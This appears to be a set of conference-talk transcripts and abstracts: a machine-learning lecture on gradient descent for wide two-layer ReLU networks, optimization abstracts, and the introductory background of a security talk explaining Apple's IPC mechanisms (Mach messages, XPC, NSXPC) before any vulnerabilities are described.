is something that has been tried before, but I think there are questions which have not been looked at with enough care, in particular which factorization rank we must choose; in the case of phase retrieval, I think this is both a subtle and important question, and so I think this question is interesting. And with that, I thank you for your attention.
|
The Burer-Monteiro factorization is a classical heuristic used to speed up the solving of large scale semidefinite programs when the solution is expected to be low rank: One writes the solution as the product of thinner matrices, and optimizes over the (low-dimensional) factors instead of over the full matrix. Even though the factorized problem is non-convex, one observes that standard first-order algorithms can often solve it to global optimality. This has been rigorously proved by Boumal, Voroninski and Bandeira, but only under the assumption that the factorization rank is large enough, larger than what numerical experiments suggest. We will describe this result, and investigate its optimality. More specifically, we will show that, up to a minor improvement, it is optimal: without additional hypotheses on the semidefinite problem at hand, first-order algorithms can fail if the factorization rank is smaller than predicted by current theory.
|
10.5446/54181 (DOI)
|
Thank you. I would first like to thank the organizers for the event, very nice and sunny, and for inviting me. This is joint work with Lénaïc Chizat, and when I say joint, it is more like me running after Lénaïc. The topic of today is to look at gradient descent for wide two-layer neural networks. Here I drew a very wide network: we have the input, x in R^d, we have m hidden neurons, and a single output, which I call y. I am going to restrict myself to a particular activation function and consider prediction functions of the form f(x) equals one over m times the sum over i from 1 to m of a_i (b_i transpose x)_+. So I am considering the so-called ReLU activation function: the plus is just the positive part, the max of the argument and zero.

Why is it interesting? This is really a small proxy for deep learning. It is a huge simplification: a single hidden layer, so not really deep; no convolution, no pooling, no weird things; a good old fully connected neural network. And I am going to focus a lot on this activation function. Why is it hard for us? The function is linear in a, which is the easy part, but it is non-linear in b, and this will create problems for optimization. The other hard part is that these are wide networks: m, the number of hidden neurons, will tend to infinity. This is the so-called over-parameterized regime: we are not trying to compare the number of observations to the number of parameters, we take m to infinity. And as we will see, a big caveat in our analysis is the lack of quantitative statements: m is very big, and I will not tell you how big it needs to be.

All right, so this is the setup. Why are we considering this? We are going to leverage two properties. One is what I call separability: your prediction function f is a sum of terms, and the parameters of each term are unique to that term; it is a separable parameterization. Often I will use the notation f equals one over m times the sum over i from 1 to m of Phi(w_i), just to highlight the fact that f is a sum of functions; here Phi(w_i) is a function, and in our example Phi(w_i) at x is a (b transpose x)_+, so w_i is the pair (a, b). For the first part of the talk, I am going to focus mostly on that setup, just using separability. If you look carefully, this works well for one hidden layer, but if I add more layers it is not true anymore: because of the sharing of parameters, beyond a single hidden layer you do not have separability. So from the start, the things I am going to say cannot apply directly to more than one hidden layer; this is the first big assumption. The second is 2-homogeneity: Phi(lambda w) equals lambda squared Phi(w). This is true for the ReLU, and this is why we consider the ReLU in this work: the ReLU is homogeneous in a, homogeneous in b, and if you take the pair (a, b), it is 2-homogeneous. (Both properties are summarized in the display below.) Before I move on: if you want to interact with me, please do so; you have 35 minutes to do so.
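Here is a LaTeX summary of the parameterization and the 2-homogeneity property just described; the notation follows the talk.

% Two-layer ReLU network and 2-homogeneity of each unit, as described above.
\[
f(x) \;=\; \frac{1}{m} \sum_{i=1}^{m} a_i \left( b_i^{\top} x \right)_+ ,
\qquad (u)_+ = \max(u, 0), \qquad x \in \mathbb{R}^d ,
\]
\[
f \;=\; \frac{1}{m} \sum_{i=1}^{m} \Phi(w_i), \qquad
\Phi(w_i) : x \mapsto a_i \left( b_i^{\top} x \right)_+ , \qquad w_i = (a_i, b_i),
\]
\[
\Phi(\lambda w) \;=\; \lambda^{2} \, \Phi(w) \qquad \text{for all } \lambda > 0
\quad \text{(2-homogeneity of the ReLU unit).}
\]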
All right, so this is the setup. We are going to consider a classical learning setup where we have some data (x_i, y_i), i from 1 to n, nothing particular, coming from a distribution q(x, y). We have a loss L(y, f(x)), and here we are going to assume the loss is convex with respect to its second variable. This can be the logistic loss, this can be the square loss, and I consider this a weak assumption: even the deepest of deep networks use what they call the cross-entropy loss, which happens to be convex. So I am going to assume convexity in f, and I am going to minimize the risk: the risk of the function f, R(f), is an expectation of the loss L(y, f(x)). Depending on the setup, this is either the expectation with respect to the empirical distribution, that is, the average over the data (x_i, y_i), i from 1 to n, or the expected loss. In the end, this is simply a risk, and it is convex in f because I assume L is convex. So this is a very standard setup.

Now let me look at some properties. One big message of the talk, and this is true for several other talks, is that we cannot treat things separately. Here I have not talked about estimation algorithms: I just have a model, at the top, and a criterion, which is there. Typically that is enough: statisticians will tell you how to analyze it, and optimizers will tell you how to optimize it. The key message here is that you cannot do this separately; very similarly to SGD, you have to analyze a specific algorithm, which is key to the analysis. This will be, as the title says, gradient descent. So I am going to study gradient descent techniques for minimizing the risk, where the parameters of f are of that form. In f it is convex, but in w it is not convex, because Phi is not a linear function.

So this is the standard setup, and I am going to do two things; two parts in my talk. One is global convergence: the idea that although we are non-convex in w, if you let m go to infinity (and of course there will be a lot of technical assumptions we need to sweep under the carpet), then you do get global convergence. This will be the first part of the talk. Second, I will talk about what people call the implicit bias. The idea is that since I am going to optimize with m big or infinite, my space of functions is huge, so typically, in particular when I minimize the empirical risk, I have lots of minimizers. Among those minimizers, my algorithm will select one, and I want to study the one which is selected. I will show three different implicit biases and three different behaviors, and if you are nice, I will show you videos at the end. This is joint work with Lénaïc and myself from 2018, plus a mixture of something from this year and something with Edouard Oyallon from last year. If you want to know more, the papers are online.

All right, so let's look at the first element; one reason why I give a talk on the blackboard is to play with the boards. So, global convergence now. The idea is to minimize: we are going to consider G(W), where W is the full collection of weights.
You have m weight vectors w_1 through w_m; if you go back to the top board, those are my weights. And G(W) is simply the risk of one over m times the sum over i from 1 to m of Phi(w_i). This is what I want to minimize. The main gist of letting m go to infinity is to rewrite this by replacing the empirical average by the integral against a measure, and then to optimize over measures. The way this is done is to consider F(mu) equal to the risk of the integral of Phi(w) d mu(w), and we are going to assume that mu is a probability measure. This is the way we formalize it: we have a probability measure, and if you take mu to be the average of Diracs at the w_i's, then F(mu) equals G(W). (The two formulations are written side by side below.) These tools are not ours; there is a long list of people looking at this, and I think it starts back with Andrew Barron, and there is Bengio, Le Roux et al. 2005, and I worked on it quite a bit a few years ago. So this is a very classical idea. Why is it so nice? Because I have made my problem convex: the space of probability measures is a convex set, the map from mu to the integral is linear in mu, and R is convex, so I have a convex problem. The downside is that the space of probability measures on R^d is infinite-dimensional, and it is going to be hard to optimize over.

Because it is convex, what I tried first, and failed miserably at, was to use convex techniques, for example Frank-Wolfe (there have not been too many talks about Frank-Wolfe here, except for one by Yifan). I have a big convex set, which is the convex hull of many things, so I can optimize using Frank-Wolfe. In Frank-Wolfe, you build your estimator incrementally, as a weighted sum of elements, and at every iteration you have to add a new element; this is often called the Frank-Wolfe step. The good thing is that if you can do the Frank-Wolfe step, you get a nice convergence rate, 1/k, where k is the number of iterations. The downside is that to select a new neuron you have to solve the Frank-Wolfe step, and this problem happens to be NP-hard. So you have replaced the hard non-convex problem by a convex one, but every iteration requires solving an NP-hard problem, so it is not really useful; if you want to know more about all the failed attempts, there are a few pages on that in the paper. And second, it is not what people do in practice. (Audience: it is tractable if you whiten the data.) Tractable if you whiten the data, what do you mean? There is a paper by Mark... I read the paper, and I think there are some caveats involved. Anyway, the NP-hard problem is the Frank-Wolfe step itself: you have a gradient and you want to find the neuron which maximizes the correlation with that gradient; this is linear classification, which is NP-hard. If you assume some structure, maybe, but it is not the topic of today. And anyway, it is not what people do in practice.
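For reference, the finite-width objective and its measure-valued counterpart discussed above can be written as follows.

% Finite-width objective and its lifting to probability measures, as described above.
\[
G(w_1, \dots, w_m) \;=\; R\!\left( \frac{1}{m} \sum_{i=1}^{m} \Phi(w_i) \right),
\qquad
F(\mu) \;=\; R\!\left( \int \Phi(w) \, \mathrm{d}\mu(w) \right),
\]
\[
\mu \;=\; \frac{1}{m} \sum_{i=1}^{m} \delta_{w_i} \ \Longrightarrow\ F(\mu) = G(w_1, \dots, w_m).
\]
% F is convex on probability measures: mu -> \int \Phi d\mu is linear and R is convex,
% but the optimization domain is infinite-dimensional.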
In practice, people just do gradient descent on this, gradient descent on the weights (a, b): it is backprop, and we are going to study it. To study backprop, we are not going to use gradient descent exactly; we are going to make our life simpler by using the gradient flow. What is the gradient flow? If you do gradient descent (if you go hiking, this is Luminy, this is a calanque), you take discrete steps; the gradient flow is the limit with an infinitely small step size, and it corresponds to the ODE W-dot equals minus m times the gradient of G(W). The factor m is there to make things easy when I take the limit as m goes to infinity. So this is what I am going to study. Here, clearly, we move away from what people do in practice, but it is the only thing we can do at the moment, and I can hand-wave my way through justifying why it is not too bad: when your step size gets small, you get close to the gradient flow, and this is true both for the deterministic gradient and for the stochastic gradient; if you do SGD with a single pass, you can see it as an approximation of the gradient flow. So we need to study this.

The goal now is to show global convergence of the gradient flow: I have a function F defined on measures, and the goal is to show that if I run the gradient flow on that function and m is big enough, I get to the minimizer of F. We are going to need two assumptions; I do not want to dwell on the technical ones, only the important ones. The first one is 2-homogeneity. It is not necessary, but sufficient; and you cannot hope to remove such constraints entirely, because then you could globally optimize anything, which is unlikely to be true. The second is random initialization: I require that the initialization puts positive mass on all directions. Yes? How do you define Phi of w? Phi of w is at the top; for neural networks it is a function, and w is the pair (a, b). So we need to assume that the initialization covers the whole sphere of directions: because the problem is 2-homogeneous, what you care about is directions, so you need to sample weights with positive mass on every direction. Uniform is simplest, and one simple way is to take w Gaussian; this corresponds to what people do in practice, they take a and b Gaussian.

We assume this, and then we have a theorem, and I put quotes around "theorem" because I am omitting a lot of the technical assumptions. When m goes to infinity, the trajectory of the flow converges to what is called a Wasserstein gradient flow. For this first part of the statement, I will not define what a Wasserstein gradient flow is; it is just to highlight that when m goes to infinity, the dynamics corresponds to something which is mathematically well defined and which you can analyze; what you recover is a PDE, and if you want to know more, you can look at the paper, or we can talk after the break.
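In symbols, the dynamics discussed above (gradient flow on the weights and its many-particle limit) reads as follows, with my notation for the empirical measure of the particles.

% Gradient flow on the weights and its mean-field (Wasserstein) limit, as described above.
\[
\dot{W}(t) \;=\; -\, m \, \nabla G\big(W(t)\big),
\qquad W = (w_1, \dots, w_m),
\]
\[
\mu_t^{(m)} \;=\; \frac{1}{m} \sum_{i=1}^{m} \delta_{w_i(t)}
\ \xrightarrow[m \to \infty]{}\ \mu_t,
\quad \text{where } (\mu_t)_{t \ge 0} \text{ is a Wasserstein gradient flow of } F .
\]
% If moreover mu_t converges as t -> infinity to some mu_infinity, the statement discussed
% next asserts that mu_infinity is a global minimizer of F (under the homogeneity and
% initialization assumptions above).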
So this first statement has a meaning: there is a flow indexed by t, and if it has a limit mu-infinity, then mu-infinity is an argmin of F. This more or less expresses that, as we get more and more particles (we often call the w's particles), you end up converging to the correct measure, in a weak sense; it has to be a weak sense because we start with a bunch of Diracs and we may end up with a density.

This has a lot of limitations, so let me write them down immediately, together with other papers that do similar things. There is Nitanda and Suzuki, who had already shown the first aspect, and there is Mei and Montanari (and coauthors), who also do similar things: Nitanda and Suzuki prove convergence to a Wasserstein gradient flow, and Mei and Montanari prove convergence if you add some noise. It is a bit different, but it is interesting. Yes? Is the 2-homogeneity for Phi or for G? For Phi. If you take my setup over there, the loss is any convex loss; the assumption is just on Phi. And this applies to more than neural networks: it applies to sparse spikes deconvolution, it applies to matrices, so it is more general than neural networks.

But there are big caveats. The first is the "if it has a limit": we tried for several months to give sufficient conditions for the gradient flow to have a limit; in the Euclidean case this is known to be possible under classical conditions, but for Wasserstein we were not able to do it, so we simply assume that it has a limit. The second issue is that this is a very qualitative statement: it is just when m goes to infinity and t goes to infinity. I will not tell you how big m needs to be, how many neurons I need, nor how fast I am converging; I do not know. As you will see, this talk is full of open problems, and this is one of them.

Any questions on that part? Yes? Very good question. Here, as a function of mu, this is a convex function, so in the classical sense there are no local minima; but in the Wasserstein sense, there are local minima, there are stationary points. This is well known: if you take mu to be a finite set of Dirac measures and optimize the neural network, it can get stuck. So it is known that there are local minima, and there are recent formal proofs by Ohad Shamir
and colleagues. So there are local minima in that sense, and what makes our result work is an argument similar to the power method for eigenvectors; in fact this setting includes the power method, which is not obvious, but it does. I am not going to do the proof, it would take me the full day, but the idea is the following: what we show is that if you converge to a stationary point, then, since we assume m is infinite and we have a density at initialization (because of the random initialization), you cannot converge to a bad stationary point: you still have mass everywhere, and that forbids you from getting stuck, just like for the power method. If you initialize the power method at a random vector, it always converges; only if you are really unlucky and initialize exactly orthogonal to the leading eigenvector does it fail. It is a similar thing: at every step there is mass everywhere, so you cannot get stuck. It is very informal, but that is what is happening. Is it something like negative curvature? I do not know, it may be related. No, actually, it is really the fact that, and here I will use Yann LeCun's argument, if you add more and more neurons, you can find a new passage to avoid the local minima. So you are not going to show us a baby? Why a baby? That is the Yann LeCun argument. Oh, no, no baby. I have videos, but no babies.

Let me now move on to the second part, which is the implicit bias. What the first part says is that if you are over-parameterized, you can actually optimize; so now you can ask where it converges to. I said it converges to a minimizer of F(mu), where F(mu) is my risk; and if I take the empirical risk, I may have, say, eight data points and infinitely many parameters, hence a lot of minimizers. So which one am I converging to? This is the goal of the last part. How much time do I have left? 20 minutes? 10 minutes? A bit more; I said 15, so I have 20 minutes. Why do you ask?
Yeah, I don't know, I like to be polite. So here is what we are going to follow. We tried with the square loss a lot; this is three years with Lénaïc, three years of enjoyment and sometimes pain of not finding good results, and we spent a lot of time trying to do this for the square loss, where you could imagine that, the gradient being a linear function, it could be easier; and we could not do it. Then we saw very nice work by Soudry, Gunasekar and Srebro from 2018 (and probably other coauthors whom I forget). What they do is very nice: they consider the so-called interpolation regime, where you can fit the data perfectly, but in the classification setup, and they consider minimizing, for a linear function, the logistic loss; so this is logistic regression. If you do it with separable data (your data are like this in the plane, separable), then it is well known that the minimum is not attained: if you take any separating direction and let the norm of w go to infinity, all the losses converge to zero, so the infimum is not attained, and if you launch gradient descent, it diverges. This is well known. What they showed is that it does diverge in a good direction: consider w-bar equal to w divided by its L2 norm, that is, the direction; what they showed is that it converges to the max-margin classifier. For those who studied this kind of thing before 2005 (and maybe it is only Alex and me), the max-margin classifier is: minimize the norm of w squared such that y_i times w transpose x_i is greater than 1. There are many hyperplanes separating the data, but among those you want the one which maximizes the distance to the closest points; this distance is called the margin. So you will not select a direction for which two points are too close, but the one which maximizes the margin; this is really what NIPS was about twenty years ago. What is nice is that this relates gradient descent to an explicit minimum-norm solution: people often say that gradient descent implicitly does some minimum-norm regularization, and it is always hand-waving; here it is formal, there is a proof of the statement that if I launch gradient descent or the gradient flow on that problem, it diverges, but the direction converges to the max-margin one.

All right, so now let's apply this to our setup. We are going to consider minimizing R(f) equal to one over n times the sum over j from 1 to n of log(1 + exp(-y_j f(x_j))), where f is, as before, the sum over i of a_i (b_i transpose x)_+. The goal for now is to look at the effect
of doing gradient descent on the empirical logistic risk, with the space of functions being my two-layer neural networks. We will have a similar situation as before: the iterates diverge, but the function converges to something special, and the goal is to understand the various regimes. There will be three regimes; I will probably only have time to talk about two. The first regime is the kernel regime, and the second is what we call the variation-norm regime, and which one you get depends on what you optimize over.

In the kernel regime, I only optimize with respect to a. Why is it so nice to optimize only over a? First, I have removed the difficulty of b: I assume b is fixed, I sample the b_i randomly from the sphere, or Gaussian, and optimize over a, so the problem is convex. That is the first good news. Second good news: when m is fixed, this is just a linear model, so I can apply the result of the Chicago researchers, saying that I converge to the f of that form with the minimum L2 norm of a. And now I am back in familiar land from around 2007: this is the so-called random features setup. Why? Because I sample the b_i uniformly, they are fixed, they do not move anymore, and then I do minimum-L2-norm estimation on a, which is like penalizing by the L2 norm. If you know your class from Jean-Philippe Vert and Julien Mairal, you know that you can then represent f as a weighted sum of kernel functions, and the kernel here is k(x, x') equal to one over m times the dot product of the features; my features are the (b_i transpose x)_+, I have m of them, so I take the dot product of (b_i transpose x)_+ with (b_i transpose x')_+. And what random features theory says, and this is work by Rahimi and Recht 2007, and Radford Neal in the nineties, is that this converges, when m goes to infinity, to the expectation over b of (b transpose x)_+ times (b transpose x')_+. So this is a standard kernel method from 2007. What this says is that if you only optimize over the last layer, you are doing a kernel method.

There are good parts, let's not forget the good parts: you can quantify how big m needs to be, and you can quantify the rate at which this converges to the good direction, so it is much more quantitative. The bad part is that the features are fixed; this is not what people do in practice. In particular, when m goes to infinity, this space of functions is a space of very smooth functions; I will show examples in the video; in particular, a single neuron does not belong to that space, so essentially it is not adapted to targets made of a finite number of neurons. So this is the first regime: the kernel regime, where you can apply the existing results if you only optimize the last layer. Any questions on this one? How is it related to the theorem you have shown? You mean, the relation with the first result? Yes, is this result related to the theorem?
No, it is almost unrelated: you can apply the theorem, but it is a hammer to squash a fly. So is it a consequence of the theorem? It is almost a consequence, in the sense that you apply that result, you converge to the minimum-L2-norm solution for the a_i's, and we know that when m is big, doing this with many a_i's converges to the kernel solution. It is not formal, but it is more or less a consequence of it.

All right, so now let's optimize over the two layers. This is the core novelty of the work, and then I will show the videos. Let's start with a very heuristic argument. Take a_i (b_i transpose x)_+. By homogeneity, you can pull the norm of b_i out of the positive part: this is a_i times the norm of b_i, times (b_i over its norm, transpose x)_+. Do you agree with this? Now, if you optimize over the pairs (a_i, b_i) and follow the recipe that gradient descent tends to select the minimum L2-norm solution, you get the minimum L2 norm of the (a_i, b_i)'s; and the squared L2 norm of (a_i, b_i) is a_i squared plus the norm of b_i squared, which is greater than or equal to two times the absolute value of a_i times the norm of b_i. So, in a very heuristic way, if you do gradient descent over the two layers, you minimize the sum of the squared L2 norms of the (a_i, b_i)'s, which, if you are willing to follow me, amounts to minimizing the sum of the products of |a_i| and the norm of b_i, that is, an L1-type norm on those weights. And this is essentially what we prove. Let me state the theorem; this is with Lénaïc in 2020. What we show is that f converges, as before, in the following sense: when the number of neurons goes to infinity, I converge to a gradient flow, and the gradient flow, if it converges somewhere, converges to the minimum "L1-norm" solution, defined as the infimum of an integral; let me be formal for once, like that. Here sigma is the uniform measure on the sphere: you consider functions which are combinations of those ReLU functions with output weights a, you take a measure on those weights, and you penalize the output weights a by the L1 norm. (The precise variational problem is sketched below.) This formal result, in a sense, recovers things I had done three years earlier. This is called the variation norm, and there is a very nice paper about it by Kurková and Sanguineti. What is nice is that because you have this L1 norm, you have the adaptivity effect that we often see with L1 norms: Diracs are allowed. So the first good thing: you can show that this can scale well to high dimensions.
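A LaTeX sketch of the heuristic step and of the limiting variational problem described above, in the notation of the talk; sigma is the uniform measure on the sphere, and the exact normalization is my transcription of the board formula, so take it with a grain of salt.

% Heuristic step (AM-GM on the layer norms) and the variation-norm problem described above.
\[
a_i^2 + \lVert b_i \rVert_2^2 \;\ge\; 2\,\lvert a_i\rvert \,\lVert b_i \rVert_2 ,
\qquad
a_i \left( b_i^{\top} x \right)_+ \;=\; a_i \lVert b_i \rVert_2 \left( \tfrac{b_i^{\top}}{\lVert b_i \rVert_2}\, x \right)_+ ,
\]
\[
\inf_{a}\ \int_{\mathbb{S}^{d-1}} \lvert a(b)\rvert \, \mathrm{d}\sigma(b)
\quad \text{s.t.} \quad
f(x) = \int_{\mathbb{S}^{d-1}} a(b) \left( b^{\top} x \right)_+ \mathrm{d}\sigma(b),
\qquad y_j\, f(x_j) \ge 1 \ \ \forall j ,
\]
% i.e. a max-margin problem in the variation-norm (non-Hilbertian) space of functions,
% as stated in the abstract of this talk.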
So as soon as your problem has some linear, low-dimensional structure, this is going to find it, because of the L1 norm. And what is interesting is that this is still a convex problem, a convex problem for which we do not know any classical algorithm to solve it; but if you use gradient descent on the particles, it works. For the experts in the room: if you look carefully, this gives you the end of the double descent curve; you can meditate on this and we can talk at the break.

And now I want to show you the videos. The problem today is essentially this: a function of that form built from five generating neurons. I generate data from that function, and the goal is to recover the directions; because I am homogeneous, I can put the a_i inside, and the goal is to learn the five directions, which are the generating neurons. I look at what happens when m is pretty large: I sample many neurons. What we showed with Lénaïc is that when m is infinite, you should converge to the global optimum, and you see what it does for 100 neurons: it does something nice. As you can see, the dynamics is a bit strange, it oscillates in many ways; let me play it again. What is open here is that we are only qualitative: when m is big, it is fine; but when we take m equal to five, it does not work, it gets stuck. You launch it with five neurons, you know you could converge to the global optimum, but you never reach it; as soon as you take m equal to 10 or 20, it does work, and we do not know why. So, first open problem. What if you start really, really close to the true value? Sure, but of course, if you start at the optimum, or close enough to it, you converge to the optimum; that is not the point.

Now the final plot: on the left, training only the output layer; on the right, the two layers. You have pluses on the left, pluses and minuses everywhere. What I showed you is that the left corresponds to L2-type regularization, so it converges to a kernel method and should be a smooth function, whereas the right should converge to an L1-norm-type solution, where because of the L1 norm you select only a small number of neurons, so it should be spiky. And indeed, c'est joli. First, it is Lénaïc, not me, who made those nice videos. On the right you see the convergence, plotted as classification regions; this is based on 12 or 13 neurons. Whereas for the kernel method you get a very smooth function. Let me play it again to highlight the difference. Okay, so I am almost done. I have mentioned several open problems. The most important one, which we have tried hard at, and any help is welcome, is to make this quantitative: we can do it for kernel methods, that is work from five years ago, but as soon as you go to the full setting, even though in practice it behaves quite well and you do not seem to need infinitely many neurons, we do not know how to do it; we have tried to simplify the problem a lot, and it is still not done. Going convolutional: we do not know how to do it.
So we want to go beyond that, and finally we will have to go deep: trying to go beyond one hidden layer, but at the moment it is very hard. Thank you for your attention.
|
Neural networks trained to minimize the logistic (a.k.a. cross-entropy) loss with gradient-based methods are observed to perform well in many supervised classification tasks. Towards understanding this phenomenon, we analyze the training and generalization behavior of infinitely wide two-layer neural networks with homogeneous activations. We show that the limits of the gradient flow on exponentially tailed losses can be fully characterized as a max-margin classifier in a certain non-Hilbertian space of functions.
|
10.5446/54185 (DOI)
|
Hello everyone, another year to see you in this special mode. Welcome to our talk, Caught You: Reveal and Exploit IPC Logic Bugs Inside Apple. First, a self-introduction. Zhipeng Huo is a senior security researcher and a member of the EcoSec team at Tencent Security Xuanwu Lab. His research focuses on macOS, iOS and Windows platform security. He has found and reported many vulnerabilities to Apple and Microsoft. He is a speaker of Black Hat Europe 2018 and DEF CON 28. Yuebin Sun is a co-author of this presentation. He is a senior security researcher of the EcoSec team. He focuses on macOS and iOS platform security. Chuanda Ding is also a co-author of this presentation. He leads the EcoSec team and is a speaker of Black Hat Europe 2018, DEF CON China 2018 and DEF CON 28.

This is the agenda of our talk. First, an introduction to IPC and logic vulnerabilities. Then we talk about the IPC mechanisms on Apple platforms. After that, we will share some interesting logic vulnerabilities we found in Preferences and the App Store. Finally, we will give a conclusion on IPC logic vulnerabilities on Apple platforms.

Let's talk about some background knowledge. What is IPC? IPC means inter-process communication. It is a set of techniques provided by the operating system that allows standalone processes to communicate with each other. The communication could be one process notifying another process about some event, or transferring data from one process to another. The processes involved in IPC can have two roles, client and server. The client sends requests to the server, and the server may respond to the client if needed. The OS kernel provides the IPC channel that allows the client and server processes to send and reply to messages.

There are three advantages that IPC provides. First, modularity. Modern software is more and more complex. With the help of IPC, developers can divide a complex system into separate modules. This reduces the complexity of the software and avoids reinventing the wheel. Second, stability. If all data and code are inside one process, a small error can crash the entire system. By dividing a complex system into separate modules, a module crash will not crash the entire system, which makes the system more stable. Third, privilege separation. With IPC, developers not only separate functionality but also separate privilege, isolating sensitive operations into separate processes and giving each process the least privilege. Even if part of the system is hacked, it will not compromise the entire system, which increases security and protection from attacks.

Let's see an example of IPC usage. For a browser, it is nearly impossible to build a rendering engine that never crashes or hangs. It is also nearly impossible to build a rendering engine that is perfectly secure. To solve this, modern browsers mostly use a multi-process architecture. For example, the components may be divided into a rendering process and a networking process. The different processes of the browser communicate with each other through IPC, and all of them also need to request operating system services. You may not feel it, but IPC is everywhere. The use of IPC divides the entire system into separate processes. Different processes have different privileges: a process may have low privilege or high privilege, it may be sandboxed or non-sandboxed. There is a security boundary between them, and IPC may break it. IPC is a bridge between different processes, so it is also a window between different privileges.
An IPC vulnerability is a key to higher privilege, so it is one of the most valuable targets for privilege escalation. Logic vulnerabilities are different from memory corruption vulnerabilities. We do not want to play with memory corruption, since that is boring to us; we like to find logic flaws. There are two kinds of logic flaws: one is introduced during the design phase and one is introduced during the implementation phase. In fact, most of the time, abusing existing features is enough for us to compromise the entire system. Apple's new MacBook and iPad Pro are equipped with the new Apple M1 chip, and the new chip brings many additional security features, such as system integrity, data protection and pointer authentication codes. The pointer authentication code, or PAC, is a hardware-level security mechanism against memory bugs, which makes memory corruption exploitation much harder. Logic vulnerabilities do not play with memory corruption and may not be affected. So is the spring of logic vulnerabilities finally coming?

Before introducing the IPC logic vulnerabilities, let's start with some fundamental knowledge of IPC on Apple platforms. Apple IPC has several different implementation methods. These include shared files, shared memory and sockets, which other systems support as well. There are also some that are unique to Apple, such as Mach messages, Apple events, distributed notifications and so on. However, the latest and most advanced IPC methods on Apple platforms are XPC and NSXPC. Apple implements them on top of Mach messages. Next, we will walk you through their principles and usage.

A Mach port is an endpoint of a unidirectional communication channel; it is one of the fundamental primitives of the XNU kernel for messaging. Messages can be sent to it or received from it. Users of a Mach port never actually see the port itself, but access it through a type of indirection called port rights. The sender of a message can send the message to a Mach port through a send right. The receiver can get the received message from the Mach port through the receive right. The message transmitted through a Mach port is called a Mach message. The trap-level APIs mach_msg and mach_msg_overwrite can be used to send or receive Mach messages. The message structure contains a header, optional complex data and a message buffer. The header contains the sender and receiver of the message. The optional complex data part can transfer complex data such as file handles, shared memory and Mach ports. The message buffer is used to send binary data. Mach messages are low level and powerful, but they are also ancient and poorly documented. Developers need to construct the entire structure to transmit data and handle the different data types by themselves. It is difficult to use, and Apple does not recommend that developers use it directly. Instead, Apple provides higher-level IPC mechanisms that are easier to use.

On top of Mach messages, Apple built another communication mechanism called XPC. XPC is managed by the launchd process. launchd is a naming server: the XPC server registers with launchd and declares that it will handle messages sent to its endpoint. The client looks up an endpoint name via launchd and sends a request message. The server receives the request, handles it and replies to the client if needed. Behind the scenes, launchd starts and terminates the target server process on demand. The message sent through XPC is called an XPC message, which is a more structured dictionary format.
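To make the client side concrete, here is a minimal, hedged C sketch of what a client of a launchd-registered XPC service looks like, using the public XPC C API described above; the service name and dictionary keys are placeholders, not the real protocol of any Apple daemon.

// Minimal XPC client sketch (macOS). Service name and keys are illustrative only.
#include <xpc/xpc.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    // Look up the named Mach service via launchd and open a connection to it.
    xpc_connection_t conn =
        xpc_connection_create_mach_service("com.example.some.service", NULL, 0);

    // A connection must have an event handler before it can be activated.
    xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
        (void)event; // errors (e.g. connection invalidated) are delivered here
    });
    xpc_connection_resume(conn);

    // Build a dictionary-shaped XPC message, as described above.
    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_string(msg, "operation", "read"); // placeholder key/value
    xpc_dictionary_set_int64(msg, "request_id", 1);

    // Send and wait synchronously for the server's reply.
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);
    char *desc = xpc_copy_description(reply);
    printf("reply: %s\n", desc);
    free(desc);

    xpc_release(msg);
    xpc_release(reply);
    xpc_release(conn);
    return 0;
}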
XPC users do not need to pay attention to the details of the underlying Mach message processing. Through the xpc_dictionary_set_* APIs, we can easily construct an XPC dictionary message. Besides supporting the transmission of basic types of data such as strings, integers and booleans, an XPC message also supports complex data types such as file descriptors and shared memory. The XPC message is serialized into a Mach message and transmitted to the other end of the IPC channel via the XNU kernel. The received Mach message is deserialized back into an XPC message, which can then be read through the xpc_dictionary_get_* APIs.

At the API level, the XPC server calls the xpc_connection_create_mach_service API with the XPC_CONNECTION_MACH_SERVICE_LISTENER flag set to register itself with launchd as an XPC service, and the client can then connect to the XPC service through the same API without that flag. Message sending is done with xpc_connection_send_message. After a process receives an XPC message, the message handler registered via xpc_connection_set_event_handler is called to process the message. (A small sketch of the server side is shown below.)

The mainstream languages for app developers are the object-oriented Objective-C and Swift, so Apple has encapsulated an object-oriented layer on top of XPC called NSXPC. NSXPC provides a set of remote procedure call interfaces: instead of caring about the underlying messages as with XPC, after establishing the connection, the client can directly call the exposed interface of the NSXPC server across processes, just like calling local methods. Apple provides several NSXPC classes for developers. The server registers the service with launchd through NSXPCListener and specifies an NSXPCListenerDelegate to handle connection requests. The connection between the client and server is managed by NSXPCConnection. What methods can a client call on a server? The NSXPC server defines this through an Objective-C protocol, which defines the programmatic interface between the calling application and the service. In the interface definition, common arithmetic types and basic types such as strings and arrays are directly supported as parameters. The interface also supports custom class objects passed as parameters; such a custom object needs to conform to the NSSecureCoding protocol. Here is an example. And here is an architectural diagram from Apple: the server registers the service through NSXPCListener, the app establishes a connection with the service through NSXPCConnection, and in this process both parties can directly call remote methods across the process boundary without caring about the underlying implementation details.
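For completeness, here is a hedged C sketch of the server side just described: registering a listener connection with launchd and handling incoming messages. Again, the service name is a placeholder, and a real daemon would also need a matching launchd property list.

// Minimal XPC server sketch (macOS). The service name is illustrative only.
#include <xpc/xpc.h>
#include <dispatch/dispatch.h>

static void handle_peer(xpc_connection_t peer) {
    xpc_connection_set_event_handler(peer, ^(xpc_object_t msg) {
        if (xpc_get_type(msg) != XPC_TYPE_DICTIONARY)
            return; // errors (e.g. connection closed) also arrive here

        const char *op = xpc_dictionary_get_string(msg, "operation");

        // Build and send a reply tied to the incoming request.
        xpc_object_t reply = xpc_dictionary_create_reply(msg);
        xpc_dictionary_set_string(reply, "status", op ? "ok" : "bad request");
        xpc_connection_send_message(peer, reply);
        xpc_release(reply);
    });
    xpc_connection_resume(peer);
}

int main(void) {
    // Register as a named Mach service listener with launchd.
    xpc_connection_t listener = xpc_connection_create_mach_service(
        "com.example.some.service", NULL, XPC_CONNECTION_MACH_SERVICE_LISTENER);

    xpc_connection_set_event_handler(listener, ^(xpc_object_t event) {
        // Each new client shows up as a connection object on the listener.
        if (xpc_get_type(event) == XPC_TYPE_CONNECTION)
            handle_peer((xpc_connection_t)event);
    });
    xpc_connection_resume(listener);

    dispatch_main(); // never returns; services the XPC queues
    return 0;
}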
